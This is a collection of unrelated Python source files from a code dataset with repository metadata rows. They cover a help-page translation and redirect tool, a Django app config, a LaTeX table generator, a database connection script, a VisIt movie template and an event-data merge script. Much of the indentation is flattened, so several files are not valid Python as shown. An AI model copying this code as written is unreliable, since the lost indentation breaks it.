if language != MAIN_LANGUAGE:
deleted_pages = delete_redirecting_help_pages(language=language)
index = get_local_file_path(language=language, page="index.md")
if os.path.isfile(index):
os.remove(index)
deleted_pages.append("index.md")
num_deleted_pages = len(deleted_pages)
logger.ok("Deleted {num_deleted_pages} page(s) for language '{lang}'".format(lang=language, num_deleted_pages=num_deleted_pages))
if extended and num_deleted_pages != 0:
logger.neutral("\t{}".format(deleted_pages))
if os.path.isfile(FILE_STATUS):
os.remove(FILE_STATUS)
logger.ok("Delete the markdown status file")
def get_not_redirected_pages(main_language, secondary_language):
"""
:param main_language: string
:param secondary_language: string
:return: list of strings: the pages which are in the `main_language` but not in the `second_language`
"""
pages_main_language = get_help_pages_in(language=main_language)
pages_this_language = get_help_pages_in(language=secondary_language)
not_redirected_pages = []
for page in pages_main_language:
if page not in pages_this_language:
not_redirected_pages.append(page)
return not_redirected_pages
def get_translated_pages(language):
"""
:param language: string
:return: list of strings: the pages which are translated (excluded the redirected pages)
"""
translated_pages = []
for page in get_help_pages_in(language=language):
if not is_old_help_page_redirecting_to_new_one(language=language, page=page) and not is_redirect_page(language=language, page=page):
translated_pages.append(page)
return translated_pages
def get_old_help_pages_redirecting_to_new_one(language):
"""
:param language: string
:return: list of strings: the pages which redirect to the renamed page
"""
old_help_pages = []
for page in get_help_pages_in(language=language):
if is_old_help_page_redirecting_to_new_one(language=language, page=page):
old_help_pages.append(page)
return old_help_pages
def get_not_translated_pages(main_language, secondary_language):
"""
:param main_language: string
:param secondary_language: string
:return: list of strings: the pages which are redirected to the main language one
"""
pages_main_language = get_help_pages_in(secondary_language)
not_translated_pages = get_not_redirected_pages(main_language=main_language, secondary_language=secondary_language)
for page in pages_main_language:
if is_redirect_page(language=secondary_language, page=page):
not_translated_pages.append(page)
return not_translated_pages
def get_pages_not_in_main_language():
"""
:return: list of strings: the pages that are not in the main language
"""
main_not_translated_pages = {}
for language in get_other_languages():
not_translated_pages = get_not_translated_pages(main_language=language, secondary_language=MAIN_LANGUAGE)
if not_translated_pages:
main_not_translated_pages[language] = not_translated_pages
return main_not_translated_pages
def get_outdated_pages(language):
"""
:param language: string
:return: list of strings: pages which are outdated and need to be revised (checks the frontmatter)
"""
outdated_pages = []
for page in get_help_pages_in(language=language):
with open(get_local_file_path(language=language, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
if post[FRONTMATTER_OUTDATED] if FRONTMATTER_OUTDATED in post.keys() else False:
outdated_pages.append(page)
return outdated_pages
def check_language_status(language, extended):
"""
checks the status of this language and prints it on the console (maybe call `update` before?)
:param language: string
:param extended: boolean: if the specific pages should be printed
"""
outdated_pages = get_outdated_pages(language=language)
num_outdated_pages = len(outdated_pages)
if language == MAIN_LANGUAGE:
main_not_translated_pages = get_pages_not_in_main_language()
num_main_not_translated_pages = len(main_not_translated_pages)
log = logger.ok if num_main_not_translated_pages == 0 and num_outdated_pages == 0 else logger.error
log("Main Language: '{lang}'".format(lang=MAIN_LANGUAGE))
if num_main_not_translated_pages == 0:
logger.ok("\thas no conflicts")
else:
            for key, value in main_not_translated_pages.items():
logger.error("\tlanguage '{lang}' has {count} additional page(s)".format(lang=key, count=len(value)))
if extended and len(value) != 0:
logger.neutral("\t\t{pages}".format(pages=value))
else:
not_translated_pages = get_not_translated_pages(main_language=MAIN_LANGUAGE, secondary_language=language)
num_not_translated_pages = len(not_translated_pages)
not_redirected_pages = get_not_redirected_pages(main_language=MAIN_LANGUAGE, secondary_language=language)
num_not_redirected_pages = len(not_redirected_pages)
log = logger.ok if num_not_redirected_pages == 0 and num_not_translated_pages == 0 and num_outdated_pages == 0 else logger.error
log("Language: '{lang}'".format(lang=language))
log = logger.ok if num_not_translated_pages == 0 else logger.error
log("\thas {num_not_translated_pages} not translated page(s)".format(num_not_translated_pages=num_not_translated_pages))
if num_not_translated_pages != 0 and extended:
logger.neutral("\t\t{not_translated_pages}".format(not_translated_pages=not_translated_pages))
log = logger.ok if num_not_redirected_pages == 0 else logger.error
log("\thas {num_not_redirected_pages} not redirected page(s)".format(num_not_redirected_pages=num_not_redirected_pages))
if num_not_redirected_pages != 0 and extended:
logger.neutral("\t\t{not_redirected_pages}".format(not_redirected_pages=not_redirected_pages))
log = logger.ok if num_outdated_pages == 0 else logger.error
log("\thas {num_outdated_pages} outdated page(s)".format(num_outdated_pages=num_outdated_pages))
if num_outdated_pages != 0 and extended:
logger.neutral("\t\t{outdated_pages}".format(outdated_pages=outdated_pages))
def create_markdown(extended):
"""
creates a markdown file of the current status (maybe call `update` before?) and opens it (`status.md`)
:param extended: boolean: it the specific pages should be included in the status report
"""
main_not_translated_pages = get_pages_not_in_main_language()
num_languages_main_not_translated_pages = len(main_not_translated_pages)
num_main_not_translated_pages = 0
for lang in main_not_translated_pages:
num_main_not_translated_pages += len(lang)
markdown_text = []
markdown_text.append("---\ntitle: Translation Status\n---\n")
date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
markdown_text.append("# Help pages status\n")
markdown_text.append(u"{date} \u2013 `{hash}`\n\n".format(date=date,
branch=get_current_branch(), hash=get_current_hash_short()))
markdown_text.append("- Main language: `{main}`\n".format(main=MAIN_LANGUAGE))
markdown_text.append("- Available languages: {other}\n".format(
other=", ".join(["`{}`".format(num) for num in get_other_languages()])))
if num_main_not_translated_pages != 0:
markdown_text.append("- **The main language is missing {count_pages} additional page(s) in {count_language} languages**\n"
.format(count_pages=num_main_not_translated_pages, count_language=num_languages_main_not_translated_pages))
        for key, value in main_not_translated_pages.items():
markdown_text.append(" - language `{lang}` has {count} additional page(s)\n".format(lang=key, count=len(value)))
if extended and len(value) != 0:
for page in value:
link = get_file_link(language=key, page=page)
markdown_text.append(" - [{page}]({link})\n".format(page=page, link=link))
markdown_text.append("\n")
markdown_text.append("\n| Language | translated | not translated | outdated | % translated | % outdated |\n")
markdown_text.append( "| -------- | ---------- | -------------- | -------- | ------------ | ---------- |\n")
are_pages_outdated = False
are_pages_not_translated = False
for language in get_all_languages():
num_pages_translated = len(get_translated_pages(language=language))
num_pages_not_translated = len(get_not_translated_pages(main_language=MAIN_LANGUAGE, secondary_language=language))
num_pages_outdated = len(get_outdated_pages(language=language))
# num_pages_old = len(get_old_help_pages_redirecting_to_new_one(language=language))
percent_translated = int((1 - num_pages_not_translated / float(num_pages_not_translated + num_pages_translated)) * 100) \
if num_pages_not_translated + num_pages_translated != 0 else 100
percent_outdated = int((num_pages_outdated / float(num_pages_translated)) * 100) if num_pages_translated != 0 else 0
markdown_text.append("| {lang} | {translated} | {not_translated} | {outdated} | {percent_translated} | {percent_outdated} |\n"
.format(lang=language, translated=num_pages_translated, not_translated=num_pages_not_translated, outdated=num_pages_outdated,
percent_translated=percent_translated, percent_outdated=percent_outdated))
are_pages_outdated |= num_pages_outdated != 0
are_pages_not_translated |= num_pages_not_translated != 0
if extended:
if are_pages_outdated:
markdown_text.append("\n\n## Outdated page(s):\n")
for language in get_all_languages():
pages_outdated = get_outdated_pages(language=language)
if len(pages_outdated) != 0:
markdown_text.append("\n### `{language}`\n\n".format(language=language))
for page in pages_outdated:
link = get_file_link(language=language, page=page)
markdown_text.append("- [{page}]({link})\n".format(page=page, link=link))
if are_pages_not_translated:
markdown_text.append("\n\n## Not translated page(s):\n\n")
for language in get_other_languages():
not_translated_pages = get_not_translated_pages(main_language=MAIN_LANGUAGE, secondary_language=language)
if len(not_translated_pages) != 0:
markdown_text.append("\n### `{language}`\n\n".format(language=language))
for page in not_translated_pages:
link_en = get_file_link(language=MAIN_LANGUAGE, page=page)
link = get_file_link(language=language, page=page)
markdown_text.append("- [{page}]({link}) ([en]({link_en}))\n".format(page=page, link=link, link_en=link_en))
write_file(filename=FILE_STATUS, content=markdown_text)
def status(extended, markdown):
"""
checks the current status (maybe call `update` before?)
:param extended: boolean: if the specific pages should be included
:param markdown: boolean: if a markdown file should be created
"""
for language in get_all_languages():
check_language_status(language=language, extended=extended)
if markdown:
create_markdown(extended=extended)
def generate_missing_redirects(language):
"""
generates all the redirecting pages depending on the main page (including the old-to-new help pages)
:return: list of strings: the redirected pages
"""
if language == MAIN_LANGUAGE:
return []
redirected_pages = []
for page in get_not_redirected_pages(main_language=MAIN_LANGUAGE, secondary_language=language):
create_redirect_page(language=language, page=page)
redirected_pages.append(page)
return redirected_pages
def generate_includes(language):
"""
generates the two layouts `back to main` and `back to toc`
:param language: string
"""
back_to_mainpage = u"<a href=\"..\">{}</a>\n".format(get_localization(language=language, key="Back to main page"))
write_file(filename=get_include_page_path_to_main(language=language), content=back_to_mainpage)
back_to_mainpage = u"<a href=\".\">{}</a>\n".format(get_localization(language=language, key="Back to table of contents"))
write_file(filename=get_include_page_path_to_toc(language=language), content=back_to_mainpage)
def update_index(extended):
"""
updates the index of all languages
:param extended: boolean: if the pages which could not be processed be printed
"""
def get_link_title_and_categories(language, page):
"""
:param language: string
:param page: string
:return: (string, string, string): file link, title, categories
"""
with open(get_local_file_path(language=MAIN_LANGUAGE, page=page)) as yaml_main_page:
with open(get_local_file_path(language=language, page=page)) as yaml_page:
main_post = frontmatter.load(yaml_main_page)
post = frontmatter.load(yaml_page)
file_link = get_relative_file_link(language=language, page=page)
title = post[FRONTMATTER_TITLE] if FRONTMATTER_TITLE in post.keys() else ""
if not title:
title = main_post[FRONTMATTER_TITLE] if FRONTMATTER_TITLE in main_post.keys() else ""
if language != MAIN_LANGUAGE and FRONTMATTER_CATEGORIES in post.keys():
logger.warn(u"categories are only needed to be declared in the {main} file, ignoring categories in following: '{lang}', '{file}'".format(main=MAIN_LANGUAGE, lang=language, file=page))
# getting the categories from the english file, prevents getting a translated category
categories = main_post[FRONTMATTER_CATEGORIES] if FRONTMATTER_CATEGORIES in main_post.keys() else []
for key in categories:
if not does_category_exist(key):
logger.error(u"Following category is not going to be considered '{lang}', '{file}', '{key}'".format(lang=language, file=page, key=key))
return file_link, title, categories
def create_index_file(order, index_file, index, indentation=2):
"""
creates the index file out of the category order and the presorted pages
:param order: list of strings: the order of the categories
:param index_file: list of strings
:param index: dict of strings and dicts: the presorted pages
:param indentation: int: how much the category is indented
"""
# 2 loops to write the link before subsections
for key, value in sorted(index.items(), key=lambda x:x[1]):
if type(value) is not dict:
index_file.append(u"- [{title}]({link})\n".format(title=value, link=key))
last_category = ""
for category in order:
if type(category) is list:
create_index_file(order=category, index_file=index_file, index=index[last_category], indentation=indentation + 1)
else:
last_category = category
if category not in index.keys():
logger.error(u"\tFollowing category is non-existent: {category}".format(category=category))
continue
translated_category = get_localization(language=language, key=category)
index_file.append(u"\n{indentation} {title}\n".format(indentation="#" * indentation, title=translated_category))
create_index_file(order=[], index_file=index_file, index=index[category], indentation=indentation + 1)
index_file.append("\n")
for language in get_all_languages():
renamed_pages = remove_help_suffix(language=language)
redirected_pages = generate_missing_redirects(language=language)
        generate_includes(language=language)
missing_frontmatter = []
num_pages_on_index = 0
index = {}
for page in get_help_pages_in(language=language):
if is_old_help_page_redirecting_to_new_one(language=language, page=page):
continue
file_link, title, categories = get_link_title_and_categories(language=language, page=page)
if not title or not categories:
missing_frontmatter.append(file_link)
continue
index_tmp = index
for category in categories:
if category not in index_tmp:
new_dict = {}
index_tmp[category] = new_dict
index_tmp = new_dict
else:
index_tmp = index_tmp[category]
index_tmp[file_link] = title
num_pages_on_index += 1
title = get_localization(language=language, key="Help contents")
more_questions = get_localization(language=language, key="You can't find a solution to your problem? You still have questions?")
forum_hint = get_localization(language=language, key="Use the online forum to get more support!")
index_file = [get_index_header(title=title, more_questions=more_questions, forum=forum_hint)]
create_index_file(order=get_categories_order(), index_file=index_file, index=index)
write_file(language + "/index.md", index_file)
num_missing_frontmatter = len(missing_frontmatter)
num_redirected_pages = len(redirected_pages)
num_renamed_pages = len(renamed_pages)
logger.ok("Language: '{language}'".format(language=language))
logger.ok("\tgenerated the 'include' pages")
logger.ok("\tremoved the 'Help' suffix from {} pages".format(num_renamed_pages))
if extended and num_renamed_pages != 0:
logger.neutral("\t\t{}".format(renamed_pages))
if language != MAIN_LANGUAGE:
logger.ok("\tredirected {} page(s)".format(num_redirected_pages))
if num_redirected_pages != 0 and extended:
logger.neutral("\t\t{}".format(redirected_pages))
if num_missing_frontmatter != 0:
logger.error("\t{} page(s) with missing frontmatter".format(num_missing_frontmatter))
if extended:
logger.neutral("\t\t{}".format(missing_frontmatter))
logger.ok("\tcreated index with {} page(s)".format(num_pages_on_index))
def remove_help_suffix(language):
"""
removes the help suffix from all pages and adds redirects in english, run `update` afterwards
:param language: string
:return: list of (string, string): (old page, new page)
"""
renamed_files = []
for page in get_help_pages_in(language=language):
if page.endswith("Help.md") and not is_old_help_page_redirecting_to_new_one(language=language, page=page):
new_page = page.replace("Help.md", ".md")
old_path = get_local_file_path(language=language, page=page)
new_path = get_local_file_path(language=language, page=new_page)
os.rename(old_path, new_path)
renamed_files.append((page, new_page))
if language == MAIN_LANGUAGE:
redirect = get_redirect_page_content(language=language, page=new_page)
write_file(filename=old_path, content=redirect)
return renamed_files
def remove_all_help_suffixes(extended):
for language in get_all_languages():
renamed_pages = remove_help_suffix(language=language)
num_renamed_pages = len(renamed_pages)
logger.ok("Language: '{language}'".format(language=language))
logger.ok("\tremoved the 'Help' suffix from {} pages".format(num_renamed_pages))
if extended and num_renamed_pages != 0:
logger.neutral("\t\t{}".format(renamed_pages))
parser = argparse.ArgumentParser()
subparser = parser.add_subparsers(help='commands', dest='command')
parser_status = subparser.add_parser(COMMAND_STATUS, help="Lists the current status of the help pages.")
parser_status.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
parser_status.add_argument("-m", "--markdown", action="store_true", dest="markdown", default=False,
help="converts the output to markdown")
parser_update = subparser.add_parser(COMMAND_UPDATE, help="Generates all the missing redirection pages and updates the index files")
parser_update.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
parser_clean = subparser.add_parser(COMMAND_CLEAN,
help="Removes all the generated redirect files (CAUTION: index page may not work anymore)")
parser_clean.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
parser_suffix = subparser.add_parser(COMMAND_REMOVE_SUFFIX,
help="Removes the 'Help' suffix from all pages and create redirects")
parser_suffix.add_argument("-e", "--extended", action="store_true", dest="extended", default=False,
help="The output is much more sophisticated")
args = parser.parse_args()
if args.command == COMMAND_STATUS:
status(extended=args.extended, markdown=args.markdown)
elif args.command == COMMAND_UPDATE:
delete_all_generated_redirecting_pages(extended=args.extended)
update_index(extended=args.extended)
create_markdown(extended=True)
elif args.command == COMMAND_CLEAN:
delete_all_generated_redirecting_pages(extended=args.extended)
elif args.command == COMMAND_REMOVE_SUFFIX:
remove_all_help_suffixes(extended=args.extended)
avg_line_length: 41.916777 | max_line_length: 203 | alphanum_fraction: 0.68838
hexsha: 5acf44f33419d3b8101e2d5a04696c52b121d755 | size: 99 | ext: py | lang: Python
path: src/kandidaturen/apps.py | repo: Sumarbrander/Stura-Mitgliederdatenbank @ 691dbd33683b2c2d408efe7a3eb28e083ebcd62a | licenses: ["MIT"]
stars: 1 (2021-12-20T20:15:26.000Z to 2021-12-20T20:15:26.000Z) | issues: null | forks: null
from django.apps import AppConfig
class KandidaturenConfig(AppConfig):
name = 'kandidaturen'
avg_line_length: 16.5 | max_line_length: 36 | alphanum_fraction: 0.777778
hexsha: 5ae487f8ac356238b78460ec7d02d0db0dff40e3 | size: 1,170 | ext: py | lang: Python
path: LaTeX/table/table_tex.py | repo: tlming16/Projec_Euler @ 797824c5159fae67493de9eba24c22cc7512d95d | licenses: ["MIT"]
stars: 4 (2018-11-14T12:03:05.000Z to 2019-09-03T14:33:28.000Z) | issues: null | forks: 1 (2018-11-17T14:39:22.000Z to 2018-11-17T14:39:22.000Z)
#!/usr/bin/env python3
# coding:utf-8
# author [email protected]
# simple script to transform text into a LaTeX table
import sys
def generate_tex_table(file_in, file_out):
    with open(file_in) as ftext:
        context = ftext.readlines()
    f = open(file_out, 'w')
f.write("\\documentclass{article}\n")
f.write("\\usepackage{ctex}\n")
f.write("\\usepackage{amsmath}\n")
f.write("\\begin{document}\n")
f.write("\\begin{table}\n")
f.write("\\begin{tabular}{")
n= len(context[0].split(' '))
for i in range(n):
f.write("|c")
f.write("|")
f.write("}\n")
for text in context:
text = text.split()
f.write("\\hline\n")
for v in range(len(text)):
f.write(text[v])
if v !=len(text)-1:
f.write('&')
f.write("\\\\\n")
f.write("\\hline\n")
f.write("\\end{tabular}\n")
f.write("\\end{table}\n")
f.write("\\end{document}\n")
if __name__ =="__main__":
if len(sys.argv)>2:
file_in = sys.argv[1]
file_out =sys.argv[2]
else:
file_in ='text.txt'
file_out ='generate_tex_table.tex'
generate_tex_table(file_in,file_out)
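# Example (illustrative): an input file containing the two lines
#   name score
#   alice 10
# produces a two-column bordered tabular whose body rows are
# "name&score\\" and "alice&10\\", each preceded by an \hline rule.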
avg_line_length: 24.893617 | max_line_length: 50 | alphanum_fraction: 0.579487
hexsha: 7a245ac8aaf32194b05d940e0f7e9b96f686b93b | size: 677 | ext: py | lang: Python
path: aggregator_auth/connect.py | repo: semen603089/aggregator-backend @ 04294e0e466c0ecfd322ec1839d3e6e6bb4d2155 | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
import keyring
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy import create_engine, MetaData, Table
DB_USER = 'grigorevsi'
system = 'app'
DB_HOST = 'db.profcomff.com'
DB_NAME = 'dev'
DB_PORT = '25432'
def get_pass(system: str, username: str):
return keyring.get_password(system, username)
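# The password must already be stored in the system keyring; a one-off
# setup step would look like this (illustrative value):
#
#   keyring.set_password("app", "grigorevsi", "<db-password>")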
DB_PASS = get_pass("app", "grigorevsi")
engine = create_engine(f"postgresql+psycopg2://{DB_USER}:{DB_PASS}@{DB_HOST}:{DB_PORT}/{DB_NAME}", echo=True)
meta = MetaData(engine)
timetable = Table('timetable', meta, autoload=True)
try:
conn = engine.connect()
print('Connection successful')
except SQLAlchemyError as e:
print(f"The error '{e}' occurred")
avg_line_length: 22.566667 | max_line_length: 109 | alphanum_fraction: 0.72969
hexsha: 7a2d9ff5776017cdd2e746e79e8ce39561b9cb41 | size: 11,105 | ext: py | lang: Python
path: src/resources/movietemplates/curveoverlay_ref.py | repo: visit-dav/vis @ c08bc6e538ecd7d30ddc6399ec3022b9e062127e | licenses: ["BSD-3-Clause"]
stars: 226 (2018-12-29T01:13:49.000Z to 2022-03-30T19:16:31.000Z) | issues: 5,100 (2019-01-14T18:19:25.000Z to 2022-03-31T23:08:36.000Z) | forks: 84 (2019-01-24T17:41:50.000Z to 2022-03-10T10:01:46.000Z)
###############################################################################
# Function: Sequence1Frames_set_timeslider
#
# Purpose:
# This is a callback function for sequence 1's IterateCallbackAndSaveFrames
# function. This function sets the time and updates the time slider so
# it has the right time value.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###############################################################################
def Sequence1Frames_set_timeslider(i, cbdata):
ts = cbdata
ret = SetTimeSliderState(i)
Query("Time")
time = GetQueryOutputValue()
ts.text = "Time = %1.5f" % time
return ret
###############################################################################
# Function: Sequence2Frames_clip_cb
#
# Purpose:
# This is a callback function for sequence 2's IterateCallbackAndSaveFrames
# function. This function lets us adjust the clip plane as a function of
# the number of time states and save out an image each time.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
# Brad Whitlock, Thu Nov 11 15:33:13 PST 2010
# We now have to DrawPlots after setting operator options.
#
###############################################################################
def Sequence2Frames_clip_cb(i, cbdata):
nts = cbdata[0]
clip = cbdata[1]
xmin = cbdata[2]
xmax = cbdata[3]
vc = cbdata[4]
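    # Linear sweep of the clip plane: i == 0 maps to xmin and
    # i == nts - 1 maps to xmax.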
t = float(i) / float(nts-1)
newX = t * (xmax - xmin) + xmin
clip.plane1Origin = (newX, 0, 0)
ret = SetOperatorOptions(clip)
DrawPlots()
SetViewCurve(vc)
return ret
###############################################################################
# Class: OverlayCurveOnReflectedPlotsMovieTemplate
#
# Purpose:
#    This movie template class creates a movie of a FilledBoundary plot
# and a Curve plot that animates over time.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###############################################################################
class OverlayCurveOnReflectedPlotsMovieTemplate(VisItMovieTemplate):
def __init__(self, mm, tr):
super(OverlayCurveOnReflectedPlotsMovieTemplate, self).__init__(mm, tr)
self.timeSlider = ""
###########################################################################
# Function: Sequence1Frames
#
# Purpose:
# This method creates the frames for sequence 1.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
# Brad Whitlock, Thu Nov 11 15:44:20 PST 2010
    #    I fixed some deprecated annotations and made reflect work again.
#
###########################################################################
def Sequence1Frames(self, formats, percents):
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence1Frames: begin")
options = self.sequence_data["SEQUENCE_1"]
# Set up the plots.
DeleteAllPlots()
OpenDatabase(options["DATABASE1"])
if options["PLOT_TYPE1"] == 0:
if AddPlot("FilledBoundary", options["PLOT_VAR1"]) == 0:
raise self.error("The FilledBoundary plot could not be created for "
"sequence 1.")
elif options["PLOT_TYPE1"] == 1:
if AddPlot("Boundary", options["PLOT_VAR1"]) == 0:
raise self.error("The Boundary plot could not be created for "
"sequence 1.")
else:
if AddPlot("Pseudocolor", options["PLOT_VAR1"]) == 0:
raise self.error("The Pseudocolor plot could not be created for "
"sequence 1.")
# Create plot 2
OpenDatabase(options["DATABASE2"])
if options["PLOT_TYPE2"] == 0:
if AddPlot("FilledBoundary", options["PLOT_VAR2"]) == 0:
raise self.error("The FilledBoundary plot could not be created for "
"sequence 1.")
elif options["PLOT_TYPE2"] == 1:
if AddPlot("Boundary", options["PLOT_VAR2"]) == 0:
raise self.error("The Boundary plot could not be created for "
"sequence 1.")
else:
if AddPlot("Pseudocolor", options["PLOT_VAR2"]) == 0:
raise self.error("The Pseudocolor plot could not be created for "
"sequence 1.")
SetActivePlots(1)
AddOperator("Reflect")
refl = ReflectAttributes()
refl.reflections = (0,0,1,0,0,0,0,0)
SetOperatorOptions(refl)
DrawPlots()
ResetView()
# If the databases are not the same then create a database correlation
# so we can get a new time slider to use. In any case, keep track
# of the time slider that we'll be using.
self.timeSlider = options["DATABASE1"]
if options["DATABASE1"] != options["DATABASE2"]:
dbs = (options["DATABASE1"], options["DATABASE2"])
if CreateDatabaseCorrelation("DB1DB2", dbs, 1) == 1:
self.timeSlider = "DB1DB2"
SetActiveTimeSlider(self.timeSlider)
# Set the background color.
annot = GetAnnotationAttributes()
annot.foregroundColor = (255, 255, 255, 255)
annot.gradientColor1 = options["GRADIENT_BGCOLOR1"]
annot.gradientColor2 = options["GRADIENT_BGCOLOR2"]
annot.gradientBackgroundStyle = annot.TopToBottom
annot.backgroundMode = annot.Gradient
# Turn off certain annotations.
annot.userInfoFlag = 0
annot.databaseInfoFlag = 0
annot.legendInfoFlag = 0
# Set the axis names
annot.axes2D.xAxis.title.title = options["XAXIS_TEXT"]
annot.axes2D.yAxis.title.title = options["YAXIS_TEXT"]
annot.axes2D.xAxis.title.userTitle = 1
annot.axes2D.yAxis.title.userTitle = 1
SetAnnotationAttributes(annot)
# Change the viewport
v = GetView2D()
v.viewportCoords = (0.1, 0.95, 0.35, 0.95)
SetView2D(v)
ts = CreateAnnotationObject("TimeSlider")
classification = CreateAnnotationObject("Text2D")
classification.text = options["CLASSIFICATION_TEXT"]
classification.useForegroundForTextColor = 0
classification.textColor = options["CLASSIFICATION_TEXTCOLOR"]
classification.position = (0.80, 0.97)
classification.height = 0.02
classification.fontBold = 1
title = CreateAnnotationObject("Text2D")
title.text = options["TITLE"]
title.position = (0.01, 0.955)
title.height = 0.03
title.fontBold = 1
# Save the frames.
cb_data = (TimeSliderGetNStates(), Sequence1Frames_set_timeslider, ts)
ret = self.IterateCallbackAndSaveFrames(cb_data, "seq1", formats, percents, "Generating sequence 1 frames")
DeleteAllPlots()
ts.Delete()
classification.Delete()
title.Delete()
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence1Frames: end")
return (ret, "seq1", GetAnnotationAttributes().backgroundColor)
###########################################################################
# Function: Sequence2Frames
#
# Purpose:
# This method creates the frames for sequence 2.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###########################################################################
def Sequence2Frames(self, formats, percents):
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence2Frames: begin")
options = self.sequence_data["SEQUENCE_2"]
# Determine the number of time steps in the first sequence's time
# slider so we can know how to advance the Clip operator.
dbc = GetDatabaseCorrelation(self.timeSlider)
nts = dbc.numStates
DeleteAllPlots()
self.DeleteAllAnnotationObjects()
# Set up the Curve plot.
OpenDatabase(options["CURVE_DATABASE"])
AddPlot("Curve", options["CURVE_VARIABLE"])
DrawPlots()
cAtts = CurveAttributes(1)
cAtts.showLabels = 0
SetPlotOptions(cAtts)
ResetView()
vc = GetViewCurve()
vc.viewportCoords = (0.1, 0.95, 0.15, 1.)
# Get the Curve plot extents
Query("SpatialExtents")
extents = GetQueryOutputValue()
AddOperator("Clip")
clip = ClipAttributes()
clip.funcType = clip.Plane
clip.plane1Status = 1
clip.plane2Status = 0
clip.plane3Status = 0
clip.plane1Origin = (extents[0], 0, 0)
clip.plane1Normal = (1, 0, 0)
clip.planeInverse = 0
SetOperatorOptions(clip)
DrawPlots()
# Set the background color.
annot = GetAnnotationAttributes()
annot.backgroundMode = annot.Solid
annot.foregroundColor = (255, 255, 255, 255)
annot.backgroundColor = (0, 0, 0, 255)
# Turn off most annotations.
annot.userInfoFlag = 0
annot.databaseInfoFlag = 0
annot.legendInfoFlag = 0
annot.axes2D.xAxis.title.visible = 0
annot.axes2D.yAxis.title.visible = 0
annot.axes2D.xAxis.label.visible = 0
annot.axes2D.yAxis.label.visible = 0
SetAnnotationAttributes(annot)
title = CreateAnnotationObject("Text2D")
title.text = options["CURVE_TITLE"]
title.position = (0.11, 0.88)
title.height = 0.1
title.fontBold = 1
        # Save the frames. This is handled elsewhere so that the saved
        # frames have the viewport names worked in.
cb_data = (nts, Sequence2Frames_clip_cb, (nts, clip, extents[0], extents[1], vc))
ret = self.IterateCallbackAndSaveFrames(cb_data, "seq2", formats, percents, "Generating sequence 2 frames")
title.Delete()
DeleteAllPlots()
self.Debug(1, "OverlayCurveOnReflectedPlotsMovieTemplate.Sequence2Frames: end")
return (ret, "seq2", GetAnnotationAttributes().backgroundColor)
###########################################################################
# Function: HandleScriptingSequence
#
# Purpose:
# This method invokes the appropriate routine for creating sequence
# frames.
#
# Programmer: Brad Whitlock
# Creation: Thu Nov 16 11:46:31 PDT 2006
#
# Modifications:
#
###########################################################################
def HandleScriptingSequence(self, seqName, formats, percents):
ret = 0
if seqName == "SEQUENCE_1":
ret = self.Sequence1Frames(formats, percents)
elif seqName == "SEQUENCE_2":
ret = self.Sequence2Frames(formats, percents)
return ret
# Public
def InstantiateMovieTemplate(moviemaker, templateReader):
return OverlayCurveOnReflectedPlotsMovieTemplate(moviemaker, templateReader)
| 37.265101 | 115 | 0.577848 |
64f37b5a2c000d16e73bc4962fbae1dfba9ea790
| 1,323 |
py
|
Python
|
data/scripts/merge.py
|
salaniz/berlin-events
|
5ad6c3b37d39194293223996a520d3a252f8a199
|
[
"BSD-3-Clause"
] | null | null | null |
data/scripts/merge.py
|
salaniz/berlin-events
|
5ad6c3b37d39194293223996a520d3a252f8a199
|
[
"BSD-3-Clause"
] | null | null | null |
data/scripts/merge.py
|
salaniz/berlin-events
|
5ad6c3b37d39194293223996a520d3a252f8a199
|
[
"BSD-3-Clause"
] | null | null | null |
import json, csv
with open('../events_location.json', 'r') as f:
json_data = json.load(f)
csv_data = []
with open('../events_data.csv', 'r') as f:
csv_reader = csv.DictReader(f)
for row in csv_reader:
csv_data.append(row)
print(csv_data[0].keys())
print(json_data[0].keys())
merged_data = []
i = 0
print(len(json_data))
print(len(csv_data))
del csv_data[0]
print(len(csv_data))
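# NOTE: zip() pairs records purely by position, so this merge assumes that
# events_data.csv and events_location.json list the same events in the same
# order.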
for csv_e, json_e in zip(csv_data, json_data):
merged_dict = {}
merged_dict['id'] = csv_e['id']
merged_dict['county'] = csv_e['bezirk']
merged_dict['name'] = csv_e['bezeichnung']
merged_dict['location'] = csv_e['strasse']
merged_dict['from'] = csv_e['von']
merged_dict['to'] = csv_e['bis']
merged_dict['time'] = csv_e['zeit']
merged_dict['host'] = csv_e['veranstalter']
merged_dict['mail'] = csv_e['mail']
merged_dict['website'] = csv_e['www']
merged_dict['comments'] = csv_e['bemerkungen']
merged_dict['fee'] = csv_e['Eintrittspreis']
if 'postcode' in json_e['address']:
merged_dict['zip'] = json_e['address']['postcode']
else:
merged_dict['zip'] = csv_e['plz']
merged_dict['lon'] = json_e['lon']
merged_dict['lat'] = json_e['lat']
merged_data.append(merged_dict)
with open('../events.json', 'w') as out:
json.dump(merged_data, out)
| 30.068182 | 58 | 0.640212 |
8f490d241158cbb2263bebb6f96df756bfb7af21
| 4,813 |
py
|
Python
|
flask_mapbox/app.py
|
gaiar/bachelor-beuth-2019
|
391af71bd6ec483b239ed200cee880651cb5396a
|
[
"MIT"
] | null | null | null |
flask_mapbox/app.py
|
gaiar/bachelor-beuth-2019
|
391af71bd6ec483b239ed200cee880651cb5396a
|
[
"MIT"
] | null | null | null |
flask_mapbox/app.py
|
gaiar/bachelor-beuth-2019
|
391af71bd6ec483b239ed200cee880651cb5396a
|
[
"MIT"
] | null | null | null |
import json
import folium
import pandas as pd
import xlrd
import requests
from geojson import Point, Feature
# import geojson
